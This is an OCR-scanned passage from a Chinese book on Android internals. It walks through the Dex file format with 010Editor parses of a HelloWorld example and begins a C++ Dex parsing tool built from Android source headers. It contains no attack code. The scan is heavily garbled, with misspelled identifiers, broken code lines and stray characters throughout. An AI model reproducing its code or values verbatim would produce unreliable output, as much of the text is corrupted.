10-26 ”DexMethodId 在 010Editor 中 的 数据 




















4 struct method id list dex mathod. ids 4 methods 
4 struct mathod id item method id[D] void HelloWorld. <init>() 


nshort vlass_ide (Dx0) HelloWorld 
short proto_idx {OxD) void 人 
Uint name_idx {0x) “Cinit>” 
A struct method id item method id[1] void HelloWorld. main(ljara. lang. Strins[]) 
Tskort cass_idx (0xD) HelloWorld 
ushort proto_idx {0x2) void (java lang. Strine[]) 
int name 1d (OxB) "main” 
二 struct method id item method id[2] void java.io, PrintStream, printlnfjava Lang. String) 
ushort class_idx (Ox1) java. 10. PrintStream 
ushort proto_idx (Dx1) void Cava.lang. String) 






uint name idr (OxD) “println” 
ut method Ans em moethod al md ] 
ushort class_idx 
ushort proto_idx 
uint name_ide 







,dang Object cinmrty (i 
Dx2) java. Lang. Object 
{OxD) void 人 
(Dx) “Cinit>” 








图 10-27 010Editor 对 DexMethodId 数组 的 解析 


解析 DexMethodId 同样 从 methodIdsSize 和 methodIdsOff 开 始 ， 它 们 的 值 分 别 是 4 和 0xF0。 
也 就 是 说 ， 该 Dex 文件 中 有 4 个 DexMethodIds， 且 它 在 文件 中 的 偏 移 位 置 在 0xF0 处 。 解 析 
后 如 表 10-9 所 示 。 
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2 
i pit 
02 00 00 00 00 00 00 00 


表 10-9 DexMethodld 的 解析 

mm 0000000 
按照 表 10-9 整理 相应 的 方法 ， 如 表 10-10 所 示 。 
表 10-10 整理 后 的 Method 







LHelloWorld;-><init>V 










LHelloWorld;->main([Ljava/lang/String;]V 
Liava/io/PrintStream;->printin(Ljava/lang/String)V 












Liava/lang/Object;-><init>V 


到 此 ， 所 有 的 索引 就 介绍 完了 ， 字 符 串 、 类 型 、 方 法 原型 、 字 段 、 方 法 这 些 关键 的 信息 
都 已 经 按照 从 0 开始 为 索引 建立 好 相应 的 表格 了 。 读 者 从 这 些 建立 的 表格 可 以 感觉 出 ， 通 过 
建立 表格 的 过 程 会 逐步 地 熟悉 Dex 文件 的 格式 ， 但 是 它 也 是 一 个 繁琐 的 过 程 。 在 刚 开 始 学 习 
的 时 候 ， 就 需要 这 样 逐个 字 节 地 去 “ 抠 ”， 搞 清楚 它 表 示 什 么 ， 它 的 作用 是 什么 。 这 样 才 能 把 
基础 的 知识 掌握 好 ， 掌 握 好 基础 以 后 使 用 工具 时 就 游 才 有余 了 。 

(8) DexClassDef 结构 体 

DexClassDef 是 DexHeader 中 给 出 的 最 后 一 个 重要 的 结构 体 了 ， 它 通过 classDefsSize 和 
classDefsO 任 给 出 。 看 一 下 DexClassDef 结构 体 的 定义 ， 该 定义 如 下 : 


/* 
* 直接 映射 的 "class def item" 
3 


struct DexClassDef { 
da4 classIidx; 
u4 accessFlags; 
u4 superclassldx; 
u4 interfacesOff; 
u4 sourceFileIldx; 
u4 annotationsOff; 
u4 classDataOff; 
u4 staticValuesOff; 
} 


该 结构 体 的 字段 中 引入 了 其 他 的 结构 体 ， 下 面 分 别 进行 介绍 。 

classIdx: 表示 class 的 类 型 ， 只 能 是 类 ， 不 能 是 数组 或 基本 类 型 ， 它 是 一 个 DexTypelds 
的 索引 值 。 

accessFlags: 表示 类 的 访问 类 型 , 它 是 以 ACC 开头 的 枚 举 值 , 在 DexFile.h 中 定义 如 下 。 

克 访问 标记 和 mask， 标 准 的 标记 和 mask 都 小 于 或 等 于 0x4000 


汝 当 上 峭 灿 看 装 地 浊 山 已 小 


由 














汪 尖 悄 灿 站 将 柯 间 ” 山 己 涡 


六 


* 注意 classFlags 枚 举 中 vm/oo/0bject.h 里 相关 的 声明 ClassFlags 
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2 
enum { 
ACC PUBLIC = 0x00000001, 
ACC_ PRIVATE = 0x00000002， 
ACC PROTECTED = OxO00000004; 
ACC STATIC = 0x00000008, 
ACC FINAL = 0x00000010, 
ACC_ SYNCHRONIZED = 0x00000020, 
ACC_ SUPER = 0x00000020, 
ACC _ VOLATILE = 0x00000040; 
ACC BRIDGE = 0x00000040, 
ACC_ TRANSIENT = 0x00000080， 
ACC_ VARARGS = 0x00000080; 
ACC NATIVE = Ox00000100, 
ACC INTERFACE = 0x00000200, 
ACC ABSTRACT = 0x00000400, 
ACC STRICT = 0x00000800， 
ACC_ SYNTHETIC = 0x00001000, 
ACC ANNOTATION = Ox00002000, 
ACC_ ENUM = 0x00004000, 
ACC CONSTRUCTOR = 0x00010000, 


ACC_ DECLARED_SYNCHRONTZED = 
0x00020000, 
ACC CLASS, MASK = 
(AGC_ PUBLIC | ACG_ FINAL 
| ACC_ SYNTHETIC 
ACC_ INNER, CLASS MASK = 
(ACC_ CLASS MASK | 
ACC FIELD MASK = 


AGC SINTEREACE | AGC .ABSTRAGT 
| ACC ANNOTATION | ACC ENUM), 
ACC_PRIVATE | 


ACC_ PROTECTED | ACC STATIC),; 


(ACC PUBLIC | ACC PRIVATE | ACC PROTECTED | ACC€ STATIC | ACC FINAL 
| ACC VOLATILE | ACC _TRANSIENT | ACC_ SYNTHETIC | ACC ENUM), 
ACC METHOD MASK = 
(ACC_ PUBLIC | ACC PRIVATE | ACC PROTECTED | ACC STATIC | ACC FINAL 
| ACC_SYNCHRONIZED | ACC BRIDGE | ACC_VARARGS | ACC NATIVE 
| ACC ABSTRACT | ACC_ STRICT | ACC _ SYNTHETIC 1 ACC _ CONSTRUCTOR 


| ACC_ DECLARED SYNCHRONIZED); 
17 


superclassIdx: 表示 superclass 的 类 型 ， 即 父 类 的 类 型 ， 它 是 一 个 DexTypelds 的 索 
引 值 。 

interfaceOff: 表示 interface 的 偏 移 地 址 ， 即 接口 的 偏 移 地 址 , 该 偏 移 处 的 值 是 DexTypeList 
类 型 的 结构 体 。 

sourceFileldx: 表示 源 代 码 的 字符 串 ， 该 值 是 DexStringIds 的 索引 值 。 

annotationsO 任 : 表示 该 class 的 注释 ， 该 值 是 在 文件 中 的 偏 移 值 ， 
DexAnnotationsDirectoryItem 结构 体 ， 该 结构 体 的 定义 如 下 。 


/* 
* Direct-mapped “annotations directory item",. 
区 

struct DexAnnotationsDirectoryItem { 


u4 
ud4 
u4 
U4 
/* 
/* 
/* 


classAnnotationsOff; 

fieldsSize; 

methodsSize; 

parametersSize; 

后 面 是 DexFieldAnnotationsItem[fieldsSize] */ 

后 面 是 DexMethodAnnotationsItem[lmethodssize] */ 

后 面 是 DexParameteraAnnotationsItem[lparametersSize] */ 
}s 


DexAnnotationsDirectoryItem 结构 体 不 是 本 节 的 重点 ， 因 此 不 做 介绍 。 





© 
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classDataOff: 表示 class 的 数据 ， 该 值 是 在 文件 中 的 偏 移 值 ， 该 偏 移 处 是 DexClassData 
结构 体 〈 该 结构 体 定 义 在 DexClass.h 文件 中 ， 并 没有 定义 在 DexFile.h 中 )， 该 结构 体 的 定义 


如 下 。 
/* class data itcen 的 扩展 形式 ， 注意 ， 如 果 特 定 项 不 存在 
* (如 没有 静态 字段 ) ,那么 
4 Set Eo NOL 光 / 
struct DexClassData 1{ 
DexClassDataHeader header; 





DexField* staticFields; 
DexField* instanceFields; 
DexMethod* directMethods; 
DexMethod* virtualMethods; 


于 

在 DexClassData 中 有 5 个 字段 ， 下 面 分 别 进行 介绍 。 

Header: 表示 其 后 4 个 字段 的 数量 ， 它 是 DexClassDataHeader 结构 体 ， 该 结构 体 的 定义 
如 下 。 


/x classl data Ltem Neadaes 的 扩展 形式 */ 

struct DexClassDataHeader { 
u4 staticFieldsSize; 
ud4 instanceFieldsSize'; 
u4 directMethodsSsize,; 
u4 virtualMethodsSsize; 

投 

该 结构 体 中 的 数量 是 以 ULEB128 进行 存储 的 ， 通 过 源码 中 可 以 看 出 ， 代 码 如 下 。 

/* 不 经 验证 就 读 取 class_data_iter 的 头 部 ， 这 会 更 新 指向 已 读 取 数 据 未 尾 的 指针 

* 

DEX_INLINE void dexReadClassDataHeader (const ul** pData, 

DexClassDataHeader *pHeader) { 

pHeader->staticFieldsSize = readUnsignedLebl128 (pData); 
pHeader-—>instanceFieldsSize = readUnsignedLeb128 (pData); 
pHeader->directMethodsSize = readUnsignedLeb128 (pData); 
pHeader->virtualMethodsSize = readUnsignedLebl128 (pData); 

} 


staticFields: 表示 静态 字段 ， 它 是 一 个 DexField 结构 体 。 

instanceFields: 表示 实例 字段 ， 它 是 一 个 DexField 结构 体 。 

directMethods: 表示 直接 方法 ， 它 是 一 个 DexMethod 结构 体 。 

virtualMethods: 表示 虚 方 法 ， 它 是 一 个 DexMethod 结构 体 。 

下 面 分 别 看 一 下 DexField 结构 体 的 定义 和 DexMethod 结构 体 的 定义 ,DexField 结构 体 
的 定义 如 下 。 


/* expanded form of encoded field */ 
struct DexFieljd { 

u4 fieldIidx; 

u4 accessFlags; 


jo 

fieldldx: 表示 在 DexFieldIds 列表 中 的 索引 。 
accessFlags: 表示 字段 的 访问 标识 。 
DexMethod 结构 体 定 义 如 下 。 


/* expanded form of encoded method */ 
struct DexMethod { 

u4 methodIidx; 

u4 accessFlags; 

u4 codeOff; 
}? 


methodIdx: 表示 在 DexMethodIds 列表 中 的 索引 。 


479 
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accessFlags: 表示 方法 的 访问 标识 。 

codeOff: 表示 指向 DexCode 结构 的 偏 移 位 置 。 

DexCode 结构 体 是 具体 类 方法 中 的 信息 ， 包 括 寄存 器 的 个 数 、 参 数 个 数 、 指 令 个 数 ， 以 
及 指令 等 信息 ，DexCode 结构 体 的 定义 如 下 。 


/* 
* Direct-mapped "code item",. 
大 


* 当 抛 出 异常 时 使 用 "catches" 表 , 当 显示 异常 栈 跟 踪 或 调试 信息 时 ， 显 示 "aebugInfo"， 偏 移 量 是 零 
* 表示 没有 条 目 
wd 
struct, DexQode, { 
u2 registersSize; 
U2 | ANSSLZep 
u2' outsSize; 
u2 triessize; 
ud debugrinfoo0fe, 
u4 insnssize; 
wal menslhl 交 
/* 后 面 是 可 选 的 u2 padding */ 
/* 后 面 是 try item[triessSizel] */ 
/* 后 面 是 uleb128 handlersSize */ 
/* 后 面 是 catch handler item[handlersSsize] */ 
ye 
TegistersSize: 表示 使 用 寄存 器 的 个 数 。 
insSize: 表示 参数 的 个 数 。 
outSize: 表示 调用 其 他 方法 时 使 用 的 寄存 器 的 个 数 。 
triesSize: 表示 异常 处 理 的 个 数 ， 即 try/catch 的 个 数 。 
debugInfoOff: 表示 调试 信息 在 文件 中 的 偏 移 。 
insnsSize: 表示 该 方法 中 包含 指令 的 数量 ， 以 字 为 单位 。 
insns: 表示 该 方法 中 的 指令 。 
staticValuesOff:; 表示 该 class 中 静态 数据 ， 该 值 是 在 文件 中 的 偏 移 值 ， 该 偏 移 处 是 
DexEncodedArray 结构 体 ， 该 结构 体 的 定义 如 下 。 
/* 
* 直接 映射 的 "encoded array" 


* 注意 ， 该 结构 是 按 字 节 对 齐 的 
Af 





struct DexEncodedArray { 
wl larray [lly 
] 5 


DexEncodedArray 结构 体 不 是 本 节 的 重点 ， 因 此 不 做 介绍 。 

关于 DexClassDef 结构 体 就 介绍 完了 ，DexClassDef 结构 体 中 最 重要 的 部 分 就 是 DexClassData 
结构 体 ， 由 DexClassData 结构 体 引 出 了 DexClassDataHeader 结构 体 、DexField 结构 体 、 
DexMethod 结构 体 和 DexCode 结构 体 。 

下 面 通过 010Editor 查看 对 DexClassDef 结构 体 相关 数据 的 解析 ， 如 图 10-28 和 图 10-29 
所 示 。 

解析 数据 同样 从 得 到 classDefsOff 和 classDefSize 开始 ，classDefsOf 的 值 为 0x110， 
classDefSize 的 值 为 1， 说明 在 该 Dex 文件 中 只 有 1 个 DexClassDef 结构 体 ， 它 在 文件 中 的 偏 
移 地 址 为 0x110。 
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dE am Li ii 1 全 
4 struot class_def ， EY i de be HelloWorld 
uint class_idx (0x0) HelloWorld 
enum ACCESS FLAGS sccess flags (Ox1) MCC_PUBLIC 
uint suparclass idc (Dx2) java, Lang Objeot 


uint interfaces_ off nh 

uint souroe file idx (Dx2) “HelloWorld. java” 

uint anmotations. off Ok 

uint olass data off 23Ah 

struct olass data item olass_data DO statie fields, 0 instance fields, 2 direct methods,*** 
uint static values off 





图 10-28 010Editor 对 DexClassDef 结构 体 的 解析 














Set clare drtal tan plsea dNta \ | 
struot ulebl28 statio, fields. size CxO 


struct ulebl28 instance fields_sizre Ox0 
struct ulebl28 direct methods_size Dx2 
b struct ulebl28 virtual_methods_sire txD 
4 struct encoded method list direct methods 2 methods 
4 struct encoded mathod method[0] public oonstruotor void HelloWorld. Cinit>(0) 
struot ulebi28 method ide diff Dx0 
struct ulabl28 acoess flags (Gx10001) MCC_PUBLIC ACC_CONSTRUCTOR 
struot ulebl28 code off Dx130 
a striuct code_item code 1 registers, 1 in argunents, 1 out argunernts, 0O tries… 
ushort raegsisters_sizre 1h 
ushort ins_sixe lh 
ushort outs_ size 1h 
ushort tries_size Ok 
uint debug info_ off 22Fh 
struct debug_ info item debuz info 
int insns_sirxe ah 
4 ushort insns[4] 
ushort insns[0] 1070h 
ushort insns[1] 证 
ushort insns[2] oh 





ushort insns[3] 
struct encoded method method[1] 


图 10-29 010Editor 对 DexClassData 结构 体 的 解析 


pnablic static void HelloWorld main(java. lang String[]) 





那么 ， 同 样 按照 前 面 的 方式 ， 将 Dex 中 的 数据 建立 成 一 张 一 张 的 表格 来 进行 分 析 。 

从 表 10-11 中 可 以 看 出 ， 类 的 名 字 为 HelloWorld， 类 的 访问 类 型 是 public， 类 的 父 类 是 
java.lang.Object， 类 所 属 的 文件 是 HelloWorld.java。 类 数据 在 文件 中 的 偏 移 地 址 为 0x23A， 其 
他 的 字段 都 为 0。 


表 10-11 DexClassDef 结构 体 解 析 





数 据 






解 析 




























classIdx 00 00 00 00 LHelloWorld 
accessFlags | 01 00 00 00 ACC PUBLIC 
superclassldx | 02 00 00 00 Lijava/lang/Object 












interfacesOff 00 00 00 00 













sourceFileldx 02 00 00 00 HelloWorld.java 








annotationsOff 00 00 00 00 








classDataOff 3A 02 00 00 











static ValuesOff 





00 00 00 00 


按照 类 数据 所 在 文件 中 的 偏 移 地 址 0x23A 来 解析 DexClassData。 在 解析 之 前 先 来 完整 的 
查看 一 下 DexClassDef 相关 的 几 个 结构 体 的 关系 ， 如 图 10-30 所 示 。 此 图 是 各 个 数据 结构 之 间 
ene 并 非 数 据 组 织 的 方法 。 根据 图 10-30, 来 解析 DexClassData 相关 的 数据 , DexClassData 

结构 体 相关 的 结构 体 有 3 个 (本 书 中 介绍 了 3 个 )， 因 此 按照 它 相 关 的 结构 体 来 整理 相关 的 
表格 。 
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有 DexClassDatatleader 


virtual MethodsSize 


classDataOff DexClassData 
StaticValuesO 优 
staticFields 
- 


DexCode 
Is | 


debugInfoOff 





图 10-30 DexClassDef 各 数据 结构 之 间 的 关系 


首先 解析 的 表格 是 DexClassDataHeader 结构 体 ， 如 表 10-12 所 示 。 





























表 10-12 DexClassDataHeader 相关 数据 结构 解析 
字 段 数 据 
staticFieldsSize 00 
instanceFieldsSize 00 
directMethodsSize 02 
virtual MethodsSize 00 





从 表 10-12 中 可 以 看 出 ， 除 了 directMethodsSize 字段 为 2 以 外 ， 其 余 的 字段 都 为 0。 那 
么 这 就 说 明 ， 这 里 只 需要 解析 directMethods 对 应 的 DexMethod 结构 体 即 可 ， 如 表 10-13 所 示 。 











表 10=13 directMethods 对 应 的 DexMethod 结构 体 解 析 
methodldx accessFlag codeOff 
00 81 80 04 | B0 02 
01 09 C8 02 


在 解析 DexMethod 结构 体 时 需要 注意 ， 最 后 的 codeO 人 结构 体 的 偏 移 是 ULEB 类 型 的 ， 
并 不 是 直接 给 出 的 。 这 里 的 值 按照 010Editor 的 值 进行 对 照 即 可 ， 如 果 想 手动 去 转换 的 话 ， 请 
参考 前 面 关 于 ULEB 读 取 的 代码 ， 这 里 不 进行 介绍 了 。 

最 后 是 对 DexCode 结构 体 进行 介绍 了 ， 解 析 后 如 表 10-14 所 示 。 








中 
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表 10-14 DexCode 结构 体 解 析 


区 
到 此 ， 关 于 Dex 文件 的 格式 就 介绍 完了 。 总 体感 觉 并 没有 PE 文件 结构 那么 复杂 ， 请 读 
者 自行 解析 一 遍 ， 以 便 加 深 印 象 。 


10.2 实现 Dex 文件 格式 解析 工具 


解析 Dex 文件 的 工作 应 该 是 自动 化 的 ， 由 工具 去 完成 。 本 节 就 通过 VS2012 来 新 建 一 个 
控制 台 的 工程 ， 然 后 完成 一 个 Dex 文件 的 解析 工作 。 


10.2.1 解析 工具 所 需 的 结构 体 


对 于 解析 Dex 文件 而 言 ， 需 要 准备 一 些 头 文件 ， 这 些 头 文件 都 可 以 从 安 卓 系统 的 源 代码 
中 获取 到 ， 首 先 要 有 common.h、uleb128.h， 因 为 common.h 中 存放 了 相应 的 数据 类 型 (这 里 
所 说 的 数据 类 型 是 ul 、u2)，uleb128.h 中 存放 了 读 取 uleb128 数据 类 型 的 相关 函数 。 接 着 要 
准备 的 是 DexFile.h、DexFile.cpp、DexClass.h 和 DexClass.cpp 4 个 文件 。 

笔者 为 了 使 用 方便 ， 将 这 4 个 文件 中 的 代码 都 复制 到 了 DexParse.h 中 ， 为 了 能 够 编译 通 
过 ， 在 函数 的 定义 部 分 进行 了 删除 ， 或 者 对 某 些 函数 的 参数 进行 了 修改 ， 对 函数 体 的 一 些 内 
容 也 进行 了 删 减 。 

读者 在 自己 准备 相关 内 容 时 ， 可 以 在 编译 时 通过 报错 信息 自己 进行 修改 。 在 这 里 ， 笔 者 
将 DexParse 文件 添加 到 了 新 建 的 控制 台 工程 当中 。 


10.2.2 解析 Dex 文件 


解析 Dex 文件 也 按照 Dex 的 格式 逐步 进行 即 可 ， 当 然 在 解析 文件 前 请 不 要 忘记 ， 对 文件 
的 操作 首先 是 要 打开 文件 。 

1. 打开 与 关闭 文件 

打开 与 关闭 文件 的 代码 在 前 面 的 章节 已 经 进行 了 介绍 ， 这 部 分 内 容 读 者 已 经 非常 熟悉 
了 ， 因 此 这 里 直接 给 出 代码 ， 代 码 如 下 : 


int tmain(int argc, _TCHAR* argv[]) 
{ 












registers_size insns_size 


04 00 00 00 








08 00 00 00 





HANDLE hFile = CreateFile(DEX FILE, GENERIC READ, FILE SHARE READ, NULL, OPEN_ 
EXISTING, FILE ACTION ADDED, NULL); 

HANDLE hMap = CreateFileMapping(hFile, NULL, PAGE READONLY, 0, 0, NULL); 
LPVOID hView = MapViewOfrFile(hMap, FILE MAP READ, 0, 0, 0):; 


UnmapViewOfFile(hView); 
CloseHandle (hMap); 
CloseHandle (hrFile); 
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Let 0 

} 
二 在 上 面 的 代码 中 ， 首 先 要 打开 文件 ， 然 后 创建 文件 映射 ， 在 MapViewOfFile 函数 和 
章 | UnmapViewOfFile 函数 之 间 ， 来 添加 关于 解析 DEX 文件 的 代码 。 
安 2. Dex 文件 头 部 
卓 在 解析 Dex 文件 时 , 需要 对 Dex 文件 的 头 部 进行 解析 , 解析 Dex 文件 的 头 部 时 ， 安 卓 系 
条 | 统 提供 了 一 个 函数 ， 函 数 定义 如 下 : 
安 DexFile* dexFilePparse(const ul* data, size t length, int fl1lags); 
全 该 函数 有 3 个 参数 ,第 一 个 参数 是 Dex 文件 数据 的 起 始 位 置 ， 第 二 个 参数 是 Dex 文件 的 
站 长 度 ， 第 三 个 参数 是 用 来 告诉 dexFileParse 函数 是 否 需要 进行 验证 的 。 对 于 目前 阶段 而 言 ， 

我 们 不 需要 第 三 个 参数 ， 因 此 将 该 函数 进行 删 减 后 的 代码 如 下 : 
DexFile* dexFileéparse(etonst ul* data, sizeé 七 length) 


| { 
DexFile* pDexFile = NULL; 
const DexHeader* pHeader? 
Const ml madgLes 


De fh De 
pDexFile = (DexFile*) malloc (sizeof' (DexFile)); 
if (pDexFile == NULL) 
gobo ak 
memset (pDexFile, 0, sizeof (DexFile)); 
/* 
* 去 掉 优 化 的 头 部 
Wh 
if (memecmp (data, DEX OPT MAGIC, 4)"=="0)" { 
magic'= datas 
if (memcmp (magic+4, DEX OPT MAGIC VERS, 4) != 0) 1 


gote bails 
} 


/* 忽略 可 选 的 头 部 和 在 这 里 追加 的 数据 
data += pDexFile->pOoptHeader->dexOffset; 
length -= pDexFile->pOptHeader->dexOffset; 
if (pDexFile-~->pOptHeader->dexLength > length) 1 
goto bail: 
} 
length = pDexFile->pOptHeader->dexLength; 
} 


dexFileSetupBasicpointers (pDexFile, data); 
pHeader = pDexFile->pHeader’; 


Va 


“SUOCensl! 


bail: 
if (result != 0 && pDexFile != NULL) { 
dexFileFree (pDexFile); 
pDexFile = NULL; 





} 


return pDexFile; 


: 
该 函数 首先 判断 Dex 文件 的 合法 性 ， 然 后 将 Dex 文件 的 一 些 基础 的 指针 进行 了 初始 化 ， 
在 dexFileParse 函数 中 调用 了 另外 一 个 函数 ， 即 dexFileSetupBasicPointers 函数 ， 该 函数 的 函 








OD ca 
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数 体 如 下 : 
void dexFileSetupBasicPointers (DexFile* pDexFile, const ul* data) 1{ 
DexHeader *pHeader = (DexHeader*) data; 


pDexFile->baseAddr = data’; 
pDexFile-—>pHeader = pHeader; 
pDexFile->pStringlids = {const DexStringld*) {data + pHeader->stringIdsOff).; 
PpDexFile->pTypelds = (const DexTypeId*) (data + pHeader->typeIlIdsOff); 
pDexFile->pFieldIds = (const DexFieldId*) (data + pHeader->fieldIdsOff); 
pDexrile->pMethodIds = (const DexMethodId*) (data + pHeader->methodIdsOff); 
pDexFile->pProtolds = (const DexProtoId*) (data + pHeader->protoIdsOff); 
pDexFile->pClassDefs = (const DexClassDef*) (data + pHeader->classDefsOff); 
PDexFile->pLinkData = (const DexLink*) (data + pHeader->1linkOff);y 

} 


从 dexFileSetupBasicPointers 函数 中 可 以 看 出 , 对 于 其 他 各 个 结构 体 的 索引 及 数量 已 经 在 
这 里 全 部 读 取 出 来 ， 在 后 面具 体 解 析 其 他 数据 结构 时 ， 它 会 很 方便 地 被 使 用 。 

在 dexFileParse 中 使 用 malloc 函数 申请 了 一 块 空间 ， 这 块 空间 在 解析 完成 以 后 需要 手动 
地 进行 释放 ， 在 安 卓 系统 的 源码 中 也 定义 了 一 个 函数 以 方便 使 用 ， 函 数 名 是 dexFileFree， 函 
数 的 定义 如 下 : 


void dexFileFree (DexFile* TDexEile) 
{ 


清关 悄 灿 放 并 坷 灿 贡 己 台 


if (PpDexFile == NULL) 
returns 


free (pDexFile); 
} 


很 简单 的 函数 ， 判 断 指 针 是 否 为 NULL， 不 为 NULL 则 直接 调用 free 函数 释放 空间 。 
有 了 上 面 的 代码 ， 那 么 就 可 以 完成 解析 Dex 文件 的 第 一 步 了 ， 具 体 代 码 如 下 : 


DWORD dwSize = GetFileSize(hFile, NULE); 
DexFile *pDexFile = dexFileParse({(const ul *)hView, (size t)dwSize); | 


dexFileFree (pDexFile); 


这 样 就 得 到 了 指向 DexFile 结构 体 的 指针 pDexFile，DexFile 结构 体 的 定义 如 下 : 
struct Dexrile { 

/* 直接 映射 的 "opt" 头 部 */ 

const DexOptHeader* pOptHeader; 


/* 指向 基础 BEX 中 直接 映射 的 结构 体 和 数组 的 指针 */ 
const DexHeader* pHeader; 

Const DexSstringId* pStringlds; 

const DexTypeld* prTypelds; 

const DexFieldIid* PrieldIids; 

const DexMethodIid* pMethodlds; 

Const Dexprotold* pProtolds; 

const DexClassDef* pCilassDefs; 

Const DexLink* pLinkDataz 


J* 
* 这 些 不 映射 到 "auxillary" 部 分 ， 可 能 不 包含 在 该 文件 中 
六 


const DexClassLookup* pClassLookup’; 
const void* pRegisterMapPool; // RegisterMapClassPool 


/* 指向 DEX 文件 开始 的 指针 */ 


const ul* baseAddr; 


/* 跟踪 辅助 结构 的 内 存 开销 */ 


int overhead; 
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/* 与 DEX 相关 联 的 其 他 数据 结构 */ 
//void* auxData; 
i 
对 于 我 们 而 言 ， 在 写 程序 时 只 需要 关心 结构 体 中 DexHeader 到 DexClassDef 之 间 的 字段 


即 可 。 


DD: 注 : 之 后 解析 的 代码 中 都 会 使 用 到 返回 的 pDexFile 指针 ， 因 此 之 后 缩写 的 代码 都 必须 写 在 调用 dexFileFree 
函数 之 前 。 


关于 数据 的 分 析 不 再 进行 过 多 的 介绍 和 说 明 ， 后 面 的 内 容 除 了 适当 地 讲解 代码 以 外 ， 不 
会 再 对 Dex 文件 进行 说 明 ， 有 不 明白 的 可 以 翻 看 前 面 的 内 容 。 

3. 解析 DexMapList 相关 数据 

DexMapList 是 在 DexHeader 的 mapO 企 给 出 的 ， 不 过 在 程序 中 不 用 直接 从 DexHeader 结 
构 体 中 去 取 ， 因 为 在 安 卓 系统 中 已 经 给 出 了 相关 的 函数 ， 函 数 代码 如 下 : 


DEX INLINE const DexMapList* dexGetMap (const DexFile* pDexFile) { 
u4 mapOff = pDexFile->pHeader->mapOff; 





if (mapCEF ==00) 0.{ 
return NULL: 
} else {1 


return (const DexMapList*) (pDexFile->baseAddr + mapOff); 
} 
} 


dexGetMap 函数 通过 前 面 返回 的 DexFile 指针 来 定位 DexMapList 在 文件 中 的 偏 移 位 置 。 


= 注 : 在 实际 的 代码 中 ,我 们 需要 将 DEX_INLINE 宏 删 掉 , 或 者 按照 安 卓 系统 的 源 代码 中 的 定义 去 定义 
TS 


通过 dexGetMap 函数 获得 了 DexMapList 的 指针 ， 那 么 接 下 来 就 可 以 对 DexMapList 进行 
遍历 了 ， 这 里 定义 一 个 自 定义 函数 来 进行 遍历 ， 代 码 如 下 : 


void PrintDexMapList (DexFile *pDexFile) 
{ 
const DexMapList *pDexMapList = dexGetMap (pDexFile); 


Printt ("DexMapList: \r\nM)y 
printf("TypeDesc\t\t type unused size offset\r\n"); 


for ud dr te pDexMapList=>s Le a ston 
{ 
SWitch (pDexMapList->list[i].type) 
{ 

case 0x0000:.:printf ("kDexTypeHeaderTitem"”) ;break; 
case Ox0001:printf ("kDexTypestringIdIitem") ;break; 
case 0x0002:printf ("kDexTypeTypeldIitem");break; 
case 0x0003:printf ("kDexTypeProtoldIitem") ;break; 
CaSe 0zxz0004:printf ("kDexTypeFieldrditem") break; 
case 0x0005:printf ("kDexTypeMethodIditem");break; 
case 0x0006:printf ("kDexTypeClassDeflitem") ;break; 
case 0x1000:printf£ ("kDexTypeMapList") ;break; 
Case 0Qx100l:printf ("kDexTypeTypeList");break; 
case 0x1002:;printf("kDexTypeAnnotationSetRefList");break; 
case Ox1003:printf ("kDexTypeAnnotationSetItem") ;break; 
CaSse Ox2000:printf ("kDexTrypeClassDataltem') ;break; 
case 0x2001:printf ("kDexTypeCodeItem") ;break; 
case Ox2002:printf ("kDexTypestringDataltem") ;break; 
Case 0x2003:printf (WkDextTypeDebuglinftortem") ?breaky 
case 0x2004;printf ("kDexTypeAnnotationIitem") ;break; 
case 0x2005:printf("kDexTypeEncodedArrayItem") ;break; 











Case QOx2006:printf ("kDexTypeAnnotationsDirectoryIlitem"),;break; 


i 

printf("\t S04AX SO0AX S08X O08X\r\n", 
pDexMapList->list[i].type, 
pDexMapList->list[i] .unused, 
pDexMapList->list[i].size, 
pDexMapList->1ist[i1] .offset),; 


: 
} 


10.2 实现 Dex 文件 格式 解析 工具 


在 main 函数 中 调用 该 函数 时 , 只 要 将 前 面 得 到 的 指向 DexFile 结构 体 的 指针 传 给 该 函数 





即 可 。 查 看 该 部 分 解析 的 输出 ， 如 图 10-31 所 示 。 


De ‘5t 
st 
an0ang 





图 10-31 DexMapList 解析 后 的 输出 


4. 解析 Stringlds 相关 数据 
对 于 Stringlds 的 解析 也 非常 简单 ， 这 里 直接 给 出 一 个 自 定义 函数 ， 代 码 如 下 : 


void Printstringlds (DexFile *pDexFile) 
{ 





printet (Dexzatringladas: NENOY Y ， 


下 BE (tad4 二 07 1 x PpDextile >pHeader—>stringldssdzer nL + 本 1) 
{ 

DLLmtE( Sd. Se VEN dy exstringEvid(pDexnile,; "TL)) 
} 








} 
在 该 自 定义 函数 中 ， 它 调用 了 dexStringByld 函数 ， 也 就 是 通过 索引 值 来 得 到 字符 些 


函数 的 定义 如 下 : 

/二 通过 特定 的 string_iqd inde 关 返回 UIE-8 编码 的 字符 串 */ 

DEX_ TNLINE CoOnst char* dexStringById(const DexFile* ppbexFile, 4 Idx) { 
const DexSstringId* pstringId = dexGetStringId (pDexFile, idx); 
return dexGetstringData (pDexFile, pstringId); 

} 


在 dexStringById 函数 中 又 调用 了 两 个 其 他 的 函数 , 分 别 是 dexGetStringId 和 dexGetStringData， 


读者 可 以 自行 查看 。 
在 main 函数 中 调用 笔者 的 自 定 义 函 数 ， 输 出 如 图 10-32 所 示 。 











图 10-32 StringIds 解析 后 的 输出 
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5. 解析 Typelds 相关 数据 
解析 Typelds 也 是 非常 简单 的 ， 直 接 上 代码 即 可 ， 代 码 如 下 : 


votd PrintTybelds (Dexrile *pDexFile) 


{ 
printE("DexTypelde: NeNnT 


BE (Bd 0 Lx PDexhile->pHeader->tybeLldssiee: LL + ) 
{ 
pronte( sd Ss Nr Nn dy dexotrindgBy livyoeldx (Doerriler Tx 
} 
} 


代码 中 调用 了 一 个 关键 的 函数 dexStringByTypeIdx， 该 函数 也 是 安 草 系统 源码 中 提供 的 


函数 ， 该 函数 的 实现 如 下 : 
A 
* 获取 与 指定 的 类 型 索引 相关 联 的 描述 符 字 符 串 
* 调用 者 不 能 释放 返回 的 字符 串 
a 
DEX. TNLINE eonst ehar* GQexSstringByTypeLdz(eonst Dexrile* pDexrile, ud4 idx) { 
const DexTypeIdx typeld = dexGetTypeId(pDexFile,; idx); 
return dexStringById(pDexFile, typeId->descriptorIdx); 











} 

在 dexStringByTypeldx 函数 中 调用 了 dexGetTypeld 和 dexStringById 两 个 函数 ， 请 读者 自 
行 在 源码 中 查看 。 

在 main 函数 中 调用 笔者 的 自 定义 函数 ， 输 出 如 图 10-33 所 示 。 

6. 解析 Protolds 相关 数据 

Proto 是 方法 的 原型 或 方法 的 声明 ， 也 就 是 提供 了 方法 的 返回 
